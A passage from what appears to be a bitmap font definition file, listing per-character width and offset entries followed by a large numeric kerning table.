(7,528),# 3
(10,550),# 4
(9,594),# 5
(9,638),# 6
(7,682),# 7
(7,704),# 8
(8,726),# 9
(2,748),# :
(2,770),# ;
(12,792),# <
(11,836),# =
(12,880),# >
(7,924),# ?
(10,946),# @
(14,990),# A
(10,1034),# B
(10,1078),# C
(13,1122),# D
(9,1166),# E
(7,1210),# F
(13,1232),# G
(14,1276),# H
(5,1320),# I
(8,1342),# J
(12,1364),# K
(10,1408),# L
(16,1452),# M
(16,1496),# N
(13,1540),# O
(12,1584),# P
(15,1628),# Q
(13,1672),# R
(8,1716),# S
(11,1738),# T
(11,1782),# U
(15,1826),# V
(19,1870),# W
(13,1936),# X
(15,1980),# Y
(10,2024),# Z
(3,2068),# [
(10,2090),# \
(3,2134),# ]
(10,2156),# ^
(11,2200),# _
(4,2244),# `
(6,2266),# a
(9,2288),# b
(7,2332),# c
(7,2354),# d
(7,2376),# e
(6,2398),# f
(8,2420),# g
(9,2442),# h
(4,2486),# i
(6,2508),# j
(10,2530),# k
(4,2574),# l
(13,2596),# m
(9,2640),# n
(8,2684),# o
(9,2706),# p
(10,2750),# q
(9,2794),# r
(5,2838),# s
(6,2860),# t
(8,2882),# u
(9,2904),# v
(15,2948),# w
(9,2992),# x
(8,3036),# y
(8,3058),# z
(6,3080),# {
(1,3102),# |
(5,3124),# }
(11,3146),# ~
(4,3190),# °
)
kerning = (
(3,3,3,3,3,3,3,3,2,2,2,3,2,3,2,2,3,3,3,3,3,2,3,3,3,3,3,2,2,3,3,2,3,3,2,3,3,3,2,1,3,3,3,3,3,3,2,3,2,3,3,3,2,3,3,3,3,3,3,3,1,1,0,3,3,3,2,2,3,3,2,2,3,0,3,3,3,3,2,1,2,1,2,2,3,2,2,3,2,3,2,3,3,2,3,),
(2,3,3,3,3,2,3,2,2,2,0,1,0,2,0,2,3,2,3,3,3,1,3,3,3,1,1,0,0,3,3,1,0,3,2,3,3,3,2,1,3,0,3,3,3,1,2,3,2,3,3,3,2,3,3,0,3,2,3,3,1,0,0,3,0,1,0,0,0,3,0,2,3,0,1,2,0,2,0,0,0,0,0,1,0,0,0,0,0,2,2,3,3,0,3,),
(8,9,9,9,9,8,9,8,7,7,6,7,6,8,3,8,6,8,8,9,9,8,9,9,9,7,7,7,8,7,9,8,5,8,8,9,8,8,8,6,7,5,7,7,8,4,8,9,8,7,9,9,8,6,6,5,8,8,9,7,7,6,0,6,8,7,7,7,7,9,8,8,7,5,7,8,7,8,7,6,7,7,8,7,8,6,8,6,6,8,8,9,6,5,8,),
(5,6,6,6,6,5,6,5,4,4,4,4,4,5,3,5,5,5,6,6,6,5,6,6,6,4,4,3,5,6,6,5,5,6,5,6,5,5,5,3,4,5,5,4,6,5,5,6,5,5,6,6,5,5,5,5,6,5,6,5,4,5,0,4,4,4,5,5,5,6,5,5,6,3,4,5,4,5,5,3,5,3,3,4,5,2,2,4,3,5,5,6,5,5,6,),
(9,10,8,9,8,9,10,9,9,8,4,9,5,9,7,8,10,9,9,9,9,8,10,9,8,9,9,5,9,9,9,8,9,9,9,8,9,9,8,8,10,9,9,10,9,9,8,9,8,9,9,8,9,9,9,9,10,9,10,10,8,9,0,10,9,9,9,9,9,9,8,9,10,7,8,9,8,8,9,7,9,7,8,7,9,6,6,9,6,8,8,10,9,9,9,),
(12,10,13,12,12,10,12,13,10,10,9,11,9,12,8,13,8,10,10,11,10,13,10,11,13,11,11,12,13,7,8,13,10,9,13,9,12,12,13,10,11,10,11,11,9,10,13,9,13,11,10,8,13,8,8,10,7,9,13,9,11,11,2,9,13,12,12,12,12,12,13,11,12,10,11,12,12,12,12,11,12,12,13,11,13,11,13,11,11,8,12,13,11,10,9,),
(0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,),
(2,3,2,2,2,2,3,1,4,2,1,3,1,3,3,1,3,2,3,3,3,1,3,2,2,2,3,1,1,2,3,1,2,3,1,2,3,3,1,4,3,2,3,3,3,2,2,3,2,3,3,2,2,3,3,3,3,2,4,3,4,1,0,3,2,3,1,1,1,3,4,4,3,4,2,4,2,2,1,2,1,3,2,2,1,1,1,2,4,3,2,4,3,1,3,),
(3,3,4,4,4,4,3,4,1,4,4,3,4,3,2,4,2,3,3,4,4,4,3,4,4,4,4,4,4,3,3,4,3,3,4,4,3,3,4,1,3,4,3,3,3,3,4,3,4,3,4,4,4,2,2,4,3,3,4,2,2,4,0,2,4,3,4,4,4,4,4,3,4,2,3,4,4,4,4,3,4,3,4,4,4,4,4,3,4,3,4,4,3,4,3,),
(6,7,7,7,6,6,7,7,5,5,2,5,2,6,2,7,5,6,7,7,7,7,7,7,7,6,6,6,7,7,7,7,4,7,7,6,6,6,7,4,5,1,5,5,7,3,7,7,7,5,7,6,7,5,5,3,7,5,7,6,5,5,0,5,7,6,6,6,6,7,7,6,7,4,5,6,6,6,6,5,6,6,7,5,7,6,7,5,6,4,6,7,5,0,7,),
(10,8,10,8,8,10,10,11,8,6,11,9,11,10,7,11,6,8,7,11,6,11,9,9,9,9,9,10,6,5,8,11,6,7,11,6,10,10,11,8,9,10,9,9,7,6,11,7,11,9,10,6,11,6,6,6,5,7,11,6,9,10,0,7,11,10,11,11,11,11,11,9,10,8,9,10,10,10,11,9,11,9,10,9,10,8,8,8,8,6,9,11,9,10,7,),
(2,0,0,1,2,1,1,1,1,0,0,2,0,2,1,0,0,2,2,0,2,0,1,1,1,2,2,0,0,1,0,0,2,0,0,0,2,2,0,0,2,2,2,2,0,2,0,0,0,2,1,0,0,0,0,2,0,2,2,0,2,0,0,0,2,2,1,0,1,1,2,2,2,1,2,2,2,2,1,0,0,2,1,0,1,0,0,2,1,2,1,2,2,0,0,),
(4,2,4,2,2,4,4,5,2,0,5,3,5,4,1,5,0,2,1,5,0,5,3,3,3,3,3,4,0,0,2,5,0,1,5,0,4,4,5,2,3,4,3,3,1,0,5,1,5,3,4,0,5,0,0,0,0,1,5,0,3,4,0,1,5,4,5,5,5,5,5,3,4,2,3,4,4,4,5,3,5,3,4,3,4,2,2,2,2,0,3,5,3,4,1,),
(1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,),
(8,9,7,8,7,7,9,7,8,7,5,7,5,8,1,6,9,7,8,8,8,6,9,8,7,7,7,5,6,8,8,6,5,8,6,7,8,8,6,7,9,5,8,9,8,7,7,8,7,8,8,7,8,8,8,6,9,7,9,9,7,4,0,9,6,7,5,5,5,8,6,8,9,6,7,8,7,7,5,5,5,5,6,7,6,6,6,5,6,6,7,9,8,4,8,),
(8,8,9,9,9,9,8,9,6,9,9,7,9,8,6,9,7,8,8,9,9,9,8,9,9,9,9,9,9,8,8,9,8,8,9,9,8,8,9,6,7,9,7,7,8,8,9,8,9,7,9,9,9,7,7,8,8,7,9,7,7,8,0,6,9,8,9,9,9,9,9,8,9,7,7,9,9,9,9,8,9,8,9,9,9,9,9,8,9,8,9,9,7,9,8,),
(8,6,6,7,7,7,7,7,6,6,6,8,6,8,6,6,6,8,8,6,8,6,7,7,7,8,8,6,6,6,6,6,8,6,6,6,7,7,6,5,6,8,6,6,6,8,6,6,6,8,7,6,6,6,6,8,6,8,8,6,6,6,0,6,8,8,7,6,7,6,6,6,7,4,6,8,7,7,7,6,6,6,7,6,7,6,6,8,6,7,7,8,6,6,6,),
(8,7,7,8,7,8,7,8,6,7,4,8,4,8,6,7,6,8,8,7,8,7,7,7,7,8,8,5,7,7,7,6,8,7,7,7,7,7,7,5,7,8,7,7,7,8,7,7,7,8,8,7,7,6,6,8,7,8,8,6,6,7,0,6,8,8,7,7,8,7,6,6,7,5,7,8,7,7,7,6,7,6,7,7,8,6,6,8,6,7,7,8,7,7,7,),
(7,7,7,7,7,7,7,7,5,7,6,6,6,6,5,7,6,7,7,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,6,7,4,5,7,6,5,7,7,7,7,7,6,7,7,7,6,6,7,7,6,7,6,5,7,0,5,6,6,7,7,7,7,7,6,7,5,5,7,7,7,7,5,7,5,6,7,7,6,5,6,6,6,6,7,6,7,7,),
(9,8,9,8,9,9,9,10,7,7,10,9,10,9,8,10,8,9,8,10,8,10,8,8,8,9,9,9,7,8,8,10,8,8,10,7,9,9,10,7,9,9,9,9,8,8,10,8,10,8,9,7,10,8,8,8,8,9,10,8,8,9,0,8,10,9,10,10,10,10,10,8,9,7,9,9,9,9,10,8,10,8,9,8,9,7,7,8,7,9,8,10,9,9,8,),
(8,8,8,9,7,9,8,9,8,6,9,7,9,8,6,9,8,8,8,9,9,9,8,8,8,7,7,8,9,5,7,9,8,7,9,5,8,8,9,6,8,9,7,8,7,8,9,7,9,7,9,6,9,7,7,9,8,7,9,8,8,9,0,8,9,8,9,9,9,9,9,8,8,6,7,9,8,8,9,7,9,7,8,7,9,6,8,7,6,6,8,9,7,9,7,),
(8,9,9,9,9,9,9,9,8,8,9,7,9,8,6,9,9,8,9,9,9,9,9,9,9,7,7,8,9,9,9,9,8,9,9,9,9,9,9,6,8,9,9,8,9,8,9,9,9,9,9,9,9,9,9,9,9,8,9,8,7,9,0,8,9,8,9,9,9,9,9,8,9,6,7,9,8,8,9,7,9,7,8,7,9,6,7,7,6,8,8,9,9,9,9,),
(6,7,6,7,6,6,7,6,6,6,3,5,3,6,3,5,7,6,7,7,7,5,7,7,6,5,5,4,5,7,7,5,5,7,5,6,7,7,5,4,5,5,7,5,7,5,5,7,6,7,7,6,6,7,7,5,7,5,7,6,5,5,0,6,5,5,5,5,5,7,4,6,7,4,5,6,5,5,5,4,5,3,5,5,5,5,4,5,5,5,6,7,7,5,7,),
(7,7,7,7,7,7,7,7,6,6,6,7,6,7,5,7,7,7,7,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,4,6,7,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,6,5,7,0,6,7,7,7,7,7,7,7,6,7,4,6,7,6,6,7,5,7,5,6,6,7,5,4,7,5,6,6,7,7,7,7,),
(7,8,8,8,8,7,8,8,6,8,8,6,8,7,5,8,6,7,7,8,8,8,8,8,8,8,8,8,8,7,8,8,7,7,8,8,7,7,8,5,6,7,6,6,7,7,8,8,8,6,8,8,8,6,6,7,7,7,8,6,6,7,0,5,8,7,8,8,8,8,8,7,8,6,6,7,8,8,8,7,8,7,8,8,8,8,8,7,8,7,8,8,6,7,7,),
(2,0,0,2,2,1,1,2,0,2,0,2,0,2,1,2,0,2,2,0,2,1,1,2,2,2,2,0,0,1,1,2,2,0,2,2,2,1,2,0,2,2,2,2,0,2,2,0,2,2,1,2,2,0,0,2,0,2,2,0,0,0,0,0,2,2,1,0,1,2,1,1,2,0,2,2,2,2,1,1,0,0,2,2,2,2,1,2,2,2,1,2,2,0,0,),
(2,0,0,1,2,1,1,1,1,1,0,2,0,2,1,1,0,2,2,0,2,0,1,1,1,2,2,0,0,1,0,1,2,0,1,1,2,2,1,0,2,2,2,2,0,2,1,0,1,2,1,1,1,0,0,2,0,2,2,0,2,0,0,0,2,2,1,0,1,1,2,2,2,1,2,2,2,2,1,0,0,2,1,1,1,1,0,2,1,2,1,2,2,0,0,),
(11,12,11,12,11,11,12,11,10,10,6,11,7,11,10,10,9,11,12,12,12,10,12,12,11,11,11,3,6,12,12,9,10,12,10,11,11,11,10,9,11,10,11,11,12,10,10,12,11,10,12,11,11,9,10,10,12,11,12,11,10,8,1,9,11,10,9,8,9,12,10,11,12,7,11,11,11,11,9,9,8,9,10,10,9,6,6,10,8,11,11,12,11,6,12,),
(10,8,11,11,10,11,10,11,8,8,6,9,6,10,8,11,6,10,10,9,11,11,10,10,11,9,9,10,11,5,8,11,10,7,11,7,10,10,11,8,9,11,9,9,7,10,11,7,11,9,11,6,11,6,6,11,4,9,11,7,9,11,0,7,11,10,11,11,11,10,11,9,10,8,9,11,10,10,11,9,11,10,11,9,11,9,11,9,9,8,10,11,9,11,7,),
(11,9,11,10,10,10,11,12,9,8,11,10,11,11,8,12,7,8,11,11,8,12,9,10,11,10,10,12,11,3,9,12,8,8,12,8,11,11,12,9,10,10,10,10,8,7,12,8,12,10,10,8,12,7,7,7,5,7,12,8,10,10,1,8,12,11,12,12,11,11,12,10,11,9,10,11,11,11,12,10,12,10,12,10,11,10,11,9,10,6,12,12,9,10,8,),
(6,7,7,7,7,6,7,7,5,7,4,5,4,6,3,7,6,6,7,7,7,6,7,7,7,7,7,5,6,7,7,7,5,7,7,7,6,6,7,4,5,4,6,5,7,4,7,7,7,6,7,7,7,6,6,4,7,6,7,6,5,4,0,5,6,5,6,5,5,7,6,6,7,5,5,6,7,7,6,6,5,5,7,7,7,7,6,6,7,6,6,7,6,4,7,),
(9,9,10,10,10,8,9,10,7,10,9,8,9,9,6,10,5,8,9,9,10,10,9,10,10,10,10,10,10,8,9,10,8,8,10,10,9,9,10,7,8,8,8,8,8,8,10,9,10,8,9,10,10,6,6,8,8,8,10,7,8,8,0,6,10,9,10,10,9,10,10,9,10,8,8,9,10,10,10,9,10,9,10,10,10,10,10,9,10,9,10,10,8,8,8,),
(14,12,12,13,13,13,13,13,12,11,11,14,11,14,12,12,12,14,14,12,14,12,13,13,13,14,14,11,12,12,12,12,14,12,12,11,13,13,12,11,13,14,13,13,12,14,12,12,12,14,13,11,12,12,12,14,12,14,14,12,12,11,3,12,14,14,13,12,13,12,12,12,13,10,13,14,13,13,13,12,12,12,13,12,13,11,12,14,11,13,13,14,13,11,12,),
(9,10,10,10,10,9,10,10,8,10,9,8,9,9,6,10,9,9,10,10,10,9,10,10,10,10,10,8,9,10,10,10,8,10,10,10,9,9,10,7,8,9,9,8,10,8,10,10,10,9,10,10,10,9,9,9,10,9,10,9,8,9,0,8,9,8,9,9,9,10,9,9,10,8,8,9,10,10,9,9,9,8,10,10,10,10,9,9,10,9,9,10,9,9,10,),
(10,10,10,10,10,10,10,10,9,9,5,10,5,10,8,9,10,10,10,10,10,9,10,10,10,10,10,5,10,10,10,9,10,10,10,10,10,10,9,7,9,10,10,9,10,10,9,10,9,10,10,10,10,10,10,10,10,10,10,9,8,10,0,9,10,10,10,10,10,10,9,9,10,7,9,10,9,9,10,8,10,8,9,9,10,7,7,10,8,9,9,10,10,10,10,),
(12,12,13,13,13,12,12,13,10,12,13,11,13,12,9,13,9,11,12,13,13,13,12,12,13,13,13,13,13,11,12,13,11,11,13,12,12,12,13,10,11,12,11,11,11,11,13,12,13,11,12,13,13,9,9,12,11,11,13,10,11,12,2,9,13,12,13,13,13,13,13,11,12,10,11,12,12,12,13,12,13,12,13,12,13,13,13,12,13,11,13,13,11,12,11,),
(9,6,5,9,8,9,8,9,7,5,6,9,6,9,7,8,6,9,9,6,9,8,8,8,8,9,9,5,9,7,6,8,9,7,9,5,8,8,8,6,8,9,8,8,6,9,8,6,8,9,9,4,9,6,6,9,7,9,9,5,7,9,0,5,9,9,9,9,9,7,8,7,8,6,8,9,8,8,9,7,9,7,8,7,9,5,5,9,6,8,8,9,8,9,6,),
(6,7,7,7,7,6,7,6,6,6,6,5,6,6,4,6,7,6,7,7,7,6,7,7,7,6,6,5,2,7,7,6,4,7,6,7,7,7,6,4,5,5,7,5,7,3,6,7,6,7,7,7,6,7,7,4,7,6,7,6,5,5,0,6,6,5,6,6,6,7,6,6,7,4,5,6,6,6,6,4,6,5,5,6,5,4,4,4,5,6,6,7,7,5,7,),
(12,10,12,12,11,13,12,13,11,9,8,11,8,12,11,13,10,11,11,10,12,13,11,12,10,11,11,10,11,10,10,13,11,10,13,10,12,12,13,11,11,13,11,11,10,11,13,10,13,11,13,10,13,10,10,11,10,11,13,9,11,12,2,9,11,12,13,13,13,11,13,11,12,11,11,13,12,12,13,11,13,11,11,11,13,10,9,11,11,11,11,13,11,13,10,),
(14,14,11,14,12,14,14,14,14,10,11,13,11,13,12,13,14,14,14,13,14,13,14,13,13,13,13,11,11,11,13,12,14,12,13,11,13,13,13,12,14,14,12,14,13,14,13,12,12,13,14,10,13,10,12,14,14,13,14,14,14,11,3,14,13,13,13,13,14,13,12,14,14,11,12,14,13,13,13,12,13,12,12,12,14,10,11,13,10,12,13,14,13,11,13,),
(3,4,3,3,5,3,4,4,3,3,3,5,3,5,4,3,4,5,4,3,3,3,4,3,3,5,5,3,3,4,3,3,4,3,3,3,5,4,3,2,5,4,5,5,3,4,3,3,3,3,3,3,3,3,3,4,4,5,5,4,3,3,0,4,5,3,3,3,3,4,4,3,5,1,5,5,5,5,3,3,3,3,4,3,3,3,3,4,3,5,3,5,5,3,3,),
(7,8,7,7,7,7,8,7,7,7,7,6,7,7,4,7,8,6,7,7,7,7,8,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,6,8,7,7,8,7,6,7,7,7,7,7,7,7,7,7,7,8,6,8,8,6,7,0,8,7,6,7,7,7,7,7,7,8,5,6,7,7,7,7,6,7,6,7,7,7,7,7,6,7,6,7,8,7,7,7,),
(12,10,8,12,10,12,11,12,10,9,7,11,7,11,10,11,10,12,12,10,12,11,11,11,11,11,11,7,12,9,10,11,12,10,12,8,11,11,11,9,10,12,10,10,10,12,11,10,11,11,12,8,12,10,10,12,10,11,12,9,10,12,1,9,11,11,12,12,12,10,11,10,11,9,10,12,11,11,12,10,12,10,10,10,12,8,8,11,9,10,11,12,10,12,10,),
(10,7,3,10,10,10,9,10,8,3,5,10,5,10,9,9,8,10,10,7,10,9,9,9,9,10,10,4,9,9,7,8,10,8,9,7,10,9,9,7,10,10,10,10,8,10,9,8,8,10,10,6,9,4,4,10,8,10,10,5,9,9,0,6,10,10,9,9,10,9,9,9,10,8,10,10,10,10,9,8,9,9,9,8,10,6,6,10,8,10,9,10,10,9,6,),
(16,15,13,16,16,16,15,16,14,14,13,16,13,16,15,15,15,16,16,15,16,15,15,15,15,16,16,13,15,15,15,14,16,15,15,13,16,15,15,13,16,16,16,16,15,16,15,15,14,16,16,13,15,15,15,16,15,16,16,14,15,15,5,14,16,16,15,15,16,15,15,15,16,14,16,16,16,16,15,14,15,15,15,14,16,13,13,16,14,16,15,16,16,15,15,),
(15,16,12,13,12,14,16,14,16,12,12,14,12,15,11,12,16,13,15,15,12,12,16,14,14,14,14,12,12,12,15,12,12,14,12,13,12,12,12,14,16,12,12,16,15,14,12,14,13,14,14,12,15,12,14,15,16,14,16,16,16,12,5,16,12,15,12,12,12,15,12,16,16,13,14,16,12,12,12,11,12,11,12,12,12,12,12,12,12,12,14,16,15,12,15,),
(12,12,13,13,13,13,12,13,10,12,13,11,13,12,10,13,10,11,12,13,13,13,12,12,13,13,13,13,13,11,12,13,11,11,13,12,12,12,13,10,11,13,11,11,11,11,13,12,13,11,13,13,13,10,10,12,11,11,13,10,11,12,2,9,13,12,13,13,13,13,13,11,12,10,11,13,12,12,13,12,13,12,13,12,13,13,13,12,13,11,13,13,11,13,11,),
(11,12,12,12,12,11,12,12,10,12,9,10,9,11,8,12,10,11,11,12,12,11,12,12,12,12,12,10,11,11,12,12,10,11,12,12,11,11,12,9,10,8,10,10,11,8,12,12,12,10,12,12,12,10,10,8,11,11,12,10,10,9,1,9,11,10,11,10,10,12,11,11,12,10,10,11,12,12,11,11,10,10,12,12,12,12,11,11,12,11,11,12,10,8,11,),
(13,13,14,14,15,13,14,14,14,13,14,15,14,15,15,14,13,15,14,14,14,14,13,13,14,15,15,14,14,14,13,14,14,12,14,13,15,15,14,14,15,14,15,15,13,14,14,13,14,12,13,14,14,10,10,14,13,15,15,11,15,13,4,11,15,13,14,14,14,14,15,15,15,15,15,15,15,15,14,13,14,15,14,13,14,14,14,14,15,15,14,15,15,13,12,),
(11,10,10,11,13,10,12,12,12,10,10,13,10,13,12,10,11,13,12,10,11,10,11,11,11,13,13,9,10,12,10,10,12,10,11,10,13,13,10,11,13,12,13,13,11,12,10,11,10,10,11,10,10,9,9,12,11,13,13,9,13,10,2,9,13,11,11,10,11,12,13,13,13,12,13,13,13,13,11,11,10,13,12,10,11,9,8,12,12,13,11,13,13,10,10,),
(7,6,7,8,6,8,7,8,5,5,8,7,8,7,5,8,6,7,7,8,8,8,7,7,6,7,7,7,8,6,6,8,7,6,8,5,7,7,8,5,6,8,6,6,6,7,8,6,8,7,8,5,8,6,6,8,6,7,8,5,6,8,0,5,8,7,8,8,8,8,8,6,7,5,6,8,7,7,8,6,8,6,7,6,8,5,6,7,5,6,7,8,6,8,6,),
(10,11,9,10,9,10,11,9,11,10,6,9,6,10,8,8,11,9,11,11,11,8,11,10,10,9,9,6,6,9,11,6,8,11,8,8,11,11,8,9,11,8,11,11,11,9,9,11,9,11,11,6,10,11,11,10,11,9,11,11,11,6,0,11,9,10,7,7,7,11,8,11,11,8,9,11,9,9,7,7,6,7,8,9,7,6,6,8,6,9,10,11,11,6,11,),
(10,11,11,11,11,11,11,11,9,11,11,9,11,10,8,11,10,10,10,11,11,11,11,11,11,11,11,11,11,10,11,11,10,10,11,11,10,10,11,8,9,11,10,9,10,10,11,11,11,10,11,11,11,10,10,10,10,10,11,9,9,10,0,9,11,10,11,11,11,11,11,10,11,9,9,11,11,11,11,10,11,10,11,11,11,11,11,10,11,10,11,11,10,11,10,),
(14,15,13,14,13,14,15,13,14,14,10,13,10,14,8,12,15,13,15,15,15,12,15,14,14,13,13,10,10,14,15,11,9,15,12,13,15,15,12,12,14,10,15,14,15,12,13,15,13,15,15,10,13,15,15,12,15,13,15,14,13,10,4,14,10,13,10,10,10,15,10,14,15,12,13,14,10,10,10,9,10,9,10,13,10,10,10,9,10,9,14,15,15,10,15,),
(18,19,19,19,19,18,19,18,18,19,17,17,17,18,14,18,19,18,19,19,19,18,19,19,19,19,19,17,18,19,19,18,17,19,18,19,19,19,18,17,19,16,19,19,19,17,19,19,19,19,19,19,18,19,19,16,19,18,19,19,17,16,8,19,18,17,17,17,17,19,18,18,19,17,17,18,19,19,17,17,17,17,18,19,18,18,18,17,18,18,18,19,19,16,19,),
(13,10,9,12,12,12,12,12,12,9,8,13,8,13,11,11,10,13,13,10,13,11,12,12,12,13,13,8,10,11,10,10,13,11,11,9,12,12,11,10,11,13,11,11,10,13,11,10,10,13,12,9,11,10,10,13,11,13,13,10,12,10,2,10,13,13,12,11,12,11,11,12,12,9,11,13,12,12,12,11,11,11,12,11,12,9,9,13,9,12,12,13,10,10,10,),
(14,15,13,14,12,14,15,13,14,14,10,13,10,14,8,12,15,13,15,15,15,12,15,14,14,13,13,10,11,13,15,11,9,15,12,12,15,15,12,12,13,9,15,13,15,11,13,15,13,15,15,12,13,15,15,12,15,13,15,14,13,10,4,14,11,13,10,10,10,15,11,14,15,12,13,14,11,11,10,10,10,10,11,13,11,11,11,10,11,11,14,15,15,9,15,),
(10,9,9,10,8,10,9,10,8,8,5,9,5,9,8,10,9,10,10,9,10,10,9,9,9,9,9,7,10,9,9,10,10,9,10,8,9,9,10,7,8,10,9,8,9,10,10,9,10,9,10,8,10,9,9,10,9,9,10,8,8,10,0,8,9,9,10,10,10,9,10,8,9,7,8,10,9,9,10,8,10,8,8,8,10,7,7,9,7,8,9,10,9,10,9,),
(1,1,1,1,1,1,2,1,3,1,1,2,1,2,2,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,3,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,1,3,1,3,1,0,1,1,2,1,1,1,1,3,3,1,2,1,3,1,1,1,1,1,3,2,1,1,1,1,1,2,3,1,3,1,1,1,),
(8,7,5,8,9,7,9,8,9,4,6,10,6,9,10,6,7,9,8,6,8,6,7,7,7,9,10,5,7,8,6,6,8,6,7,6,9,9,6,9,9,8,9,9,7,8,6,7,6,8,7,5,7,2,2,8,7,9,9,1,9,7,0,6,9,8,7,7,7,8,10,9,9,10,9,9,9,9,7,8,7,9,8,6,7,4,5,8,10,9,7,10,9,7,6,),
(3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,),
(8,7,8,10,8,10,9,10,7,7,9,8,9,9,7,9,6,9,9,9,10,9,9,9,8,8,8,8,10,6,7,9,9,6,10,7,9,9,9,7,8,10,8,8,6,9,9,7,9,8,10,8,10,6,6,10,6,8,10,5,8,10,0,6,9,9,10,10,10,9,9,8,9,7,8,10,9,9,10,8,10,8,8,8,10,8,8,8,8,7,9,10,8,10,6,),
(8,8,2,5,1,0,10,7,7,4,0,9,6,10,2,2,3,3,4,1,2,2,4,4,3,9,9,0,0,0,4,1,0,1,1,0,2,4,0,0,6,3,0,1,0,0,0,0,0,0,3,0,0,0,0,0,0,1,8,1,8,1,11,7,5,2,4,4,4,5,3,2,7,5,1,7,0,2,3,2,1,2,6,5,3,2,0,2,3,3,5,10,6,0,7,),
(3,4,2,4,3,3,4,3,2,2,0,2,0,3,0,2,3,3,4,4,4,2,4,4,3,2,2,0,0,4,4,1,0,4,2,3,3,3,2,1,2,0,3,2,4,0,2,4,3,3,4,0,3,3,3,0,4,2,4,3,2,0,0,2,0,2,0,0,0,4,0,3,4,0,2,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,3,4,3,0,4,),
(5,3,6,6,6,6,5,6,3,5,6,4,6,5,3,6,2,5,5,6,6,6,4,5,6,6,6,6,6,3,4,6,5,2,6,5,5,5,6,3,4,6,4,4,2,5,6,2,6,4,6,6,6,2,2,5,2,4,6,3,4,5,0,2,6,5,6,6,6,6,6,4,5,3,4,6,5,5,6,5,6,5,6,5,6,6,6,5,6,4,6,6,4,6,2,),
(8,6,8,9,7,9,8,9,6,4,9,8,9,8,6,9,4,8,8,9,9,9,8,8,7,8,8,8,9,6,6,9,8,6,9,4,8,8,9,6,7,9,7,7,5,8,9,5,9,8,9,4,9,4,4,9,6,8,9,4,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,7,8,7,9,6,7,8,6,7,8,9,7,9,5,),
(6,4,7,7,7,4,6,7,4,6,2,6,2,6,5,7,4,6,5,5,7,7,4,6,7,7,7,6,7,5,5,7,5,3,7,6,6,6,7,4,6,5,6,6,4,5,7,4,7,5,5,7,7,3,3,5,4,6,7,4,5,5,0,3,7,6,6,6,6,6,7,5,6,4,6,6,6,6,6,6,6,6,7,6,7,7,7,6,7,6,6,7,6,4,3,),
(6,6,6,6,7,6,6,6,7,6,6,7,6,7,6,6,6,7,6,6,6,6,6,6,6,7,7,6,6,6,6,6,6,6,6,6,7,6,6,4,7,6,7,7,6,6,6,6,6,6,6,6,6,6,6,6,6,7,7,6,7,6,0,6,7,6,6,6,6,6,6,7,7,4,7,7,7,7,6,5,6,5,6,6,6,6,6,6,6,7,6,7,7,6,6,),
(6,4,7,6,6,6,6,7,4,4,6,6,6,6,4,7,3,6,6,6,6,7,5,5,7,6,6,7,7,4,4,7,6,4,7,3,6,6,7,4,5,6,5,5,3,6,7,3,7,6,6,6,7,2,2,6,4,6,7,3,5,6,0,3,7,6,7,7,6,6,7,5,6,4,5,6,6,6,7,5,7,6,7,5,7,6,7,6,6,5,7,7,5,6,3,),
(5,6,4,5,5,5,6,5,5,5,3,5,3,5,4,5,6,5,6,6,6,5,6,5,5,5,5,5,3,5,6,5,4,6,5,4,6,6,5,4,6,4,6,6,6,4,5,6,5,6,6,2,5,6,6,4,6,5,6,6,5,3,0,6,5,4,5,5,4,6,5,5,6,3,5,5,5,5,5,3,5,3,5,4,4,3,2,4,3,5,5,6,6,3,6,),
(8,7,6,7,8,7,7,7,7,5,6,8,6,8,8,6,6,8,8,7,8,6,7,7,7,8,8,6,6,7,7,6,8,7,6,6,8,8,6,7,8,8,8,8,7,8,6,7,6,8,7,5,6,4,5,8,7,8,8,6,8,5,0,4,8,8,7,6,7,7,8,8,8,8,8,8,8,8,7,6,6,8,7,6,7,5,6,8,8,8,7,8,8,5,7,),
(9,6,8,8,9,8,8,8,7,7,8,9,8,9,8,8,7,9,9,8,9,8,8,8,8,9,9,8,8,8,6,8,9,7,8,7,9,8,8,6,9,9,9,9,7,9,8,7,8,9,8,8,8,4,4,9,7,9,9,5,8,8,0,5,9,9,8,8,8,8,8,8,9,7,9,9,9,9,8,7,8,8,8,7,8,8,8,9,8,9,8,9,9,8,5,),
(2,3,2,3,4,2,3,3,2,3,2,4,2,4,3,2,3,4,3,3,3,2,3,3,3,4,4,2,2,3,3,2,3,3,2,3,4,3,2,1,4,3,4,4,3,3,3,3,3,3,3,3,2,3,3,3,3,4,4,3,2,2,0,3,4,2,2,2,2,3,3,2,4,1,4,4,4,4,2,2,2,2,3,3,2,2,2,3,2,4,2,4,4,2,3,),
(5,6,4,5,5,5,6,4,6,5,4,5,4,5,5,4,6,5,6,6,6,4,6,5,5,5,5,4,4,4,6,4,5,6,4,5,6,6,4,5,6,5,6,6,6,5,5,6,5,6,6,5,5,6,6,5,6,5,6,6,6,4,0,6,5,5,4,4,4,6,5,6,6,5,5,6,5,5,4,4,4,5,4,5,4,4,4,5,5,5,5,6,6,4,6,),
